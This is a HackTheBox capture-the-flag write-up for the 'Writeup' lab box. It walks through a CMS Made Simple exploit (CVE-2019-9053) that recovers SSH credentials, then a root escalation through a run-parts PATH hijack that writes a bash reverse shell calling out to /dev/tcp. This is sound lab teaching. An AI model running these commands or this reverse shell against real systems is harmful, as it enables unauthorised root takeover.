HackTheBox - Writeup

3 minute read

Writeup was a nice 20 point box created by jkr. It started with a CVE to get SSH creds and then abusing a SSH startup process by injecting into PATH to get root.

User.txt

Nmap


We start the box with a quick TCP nmap scan:

# ports=$(nmap -sT -p- --min-rate=5000 --max-retries=2 10.10.10.138 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) && 
nmap -sV -sC -T4 -p$ports 10.10.10.138

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 dd:53:10:70:0b:d0:47:0a:e2:7e:4a:b6:42:98:23:c7 (RSA)
|   256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)
|_  256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry 
|_/writeup/
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Nothing here yet.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

HTTP


We see from our scan that a robots.txt file is present on port 80. Browsing to it shows us the following:

#              __
#      _(\    |@@|
#     (__/\__ \--/ __
#        \___|----|  |   __
#            \ }{ /\ )_ / _\
#            /\__/\ \__O (__
#           (--/\--)    \__/
#           _)(  )(_
#          `---''---`

# Disallow access to the blog until content is finished.
User-agent: * 
Disallow: /writeup/


Checking out the /writeup/ directory leads us to this webpage:


CMS Made Simple


The Firefox extension Wappalyzer tells us the site is using CMS Made Simple.

A quick google search leads us to CVE-2019-9053. Running the exploit with the parameters shown below gives us a username and decrypted password:

# python cms_ex.py http://10.10.10.138/writeup -w rockyou.txt

[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
[+] Password cracked: raykayjay9


Flag


We simply SSH into the box with these credentials and we get the user flag.

# ssh jkr@10.10.10.138
jkr@10.10.10.138's password: raykayjay9
...
jkr@writeup:~$ cat user.txt 
d4e493...


Root.txt

Pspy


Uploading and running pspy, we notice that the following process is run as root every time someone logs in via SSH:

sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new  

PATH and run-parts look interesting…


Groups


Running the id command, we also spot we are in the staff group:

jkr@writeup:~$ id
uid=1000(jkr) gid=1000(jkr) groups=1000(jkr), ... 50(staff)

This group grants us certain privileges that we can abuse:

staff: Allows users to add local modifications to the system (/usr/local) without needing root privileges (note that executables in /usr/local/bin are in the PATH variable of any user, and they may “override” the executables in /bin and /usr/bin with the same name).

To confirm, we run the following command:

jkr@writeup:~$ find / -writable -group staff 2>/dev/null
/usr/local/bin
...
/usr/local/sbin


Exploitation


Because the /usr/local/bin and /usr/local/sbin directories are in the PATH environment variable of the run-parts process, the shell will look through these directories for executable programs every time the process runs.

Therefore, by dropping a malicious run-parts script into either /usr/local/bin or /usr/local/sbin, we can inject into the path and execute code of our choosing with root privileges.

Due to our ability to write to either one of these directories (because of our group permissions) we’re able to exploit this vulnerability.

First create a root.sh shell script in /usr/local/bin/ and make it executable:

jkr@writeup:~$ echo '#!/bin/bash' > /usr/local/bin/root.sh
jkr@writeup:~$ echo 'bash -i >& /dev/tcp/10.10.14.4/443 0>&1' >> /usr/local/bin/root.sh
jkr@writeup:~$ chmod +x root.sh

Then create a new run-parts script in /usr/local/bin/ to call our reverse shell script:

jkr@writeup:~$ echo '#!/bin/bash' > /usr/local/bin/run-parts
jkr@writeup:~$ echo '/usr/local/bin/root.sh' >> /usr/local/bin/run-parts
jkr@writeup:~$ chmod +x /usr/local/bin/run-parts


Flag


All we need to do now is start a new SSH session and have a netcat listener ready. Our run-parts script will be executed upon logging in via SSH, subsequently running our bash reverse shell script as root.

# ssh jkr@10.10.10.138
jkr@10.10.10.138's password: raykayjay9
# nc -nlvp 443
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.138.
Ncat: Connection from 10.10.10.138:55000.
root@writeup:/# id
id
uid=0(root) gid=0(root) groups=0(root)
root@writeup:/# cat /root/root.txt
eeba47...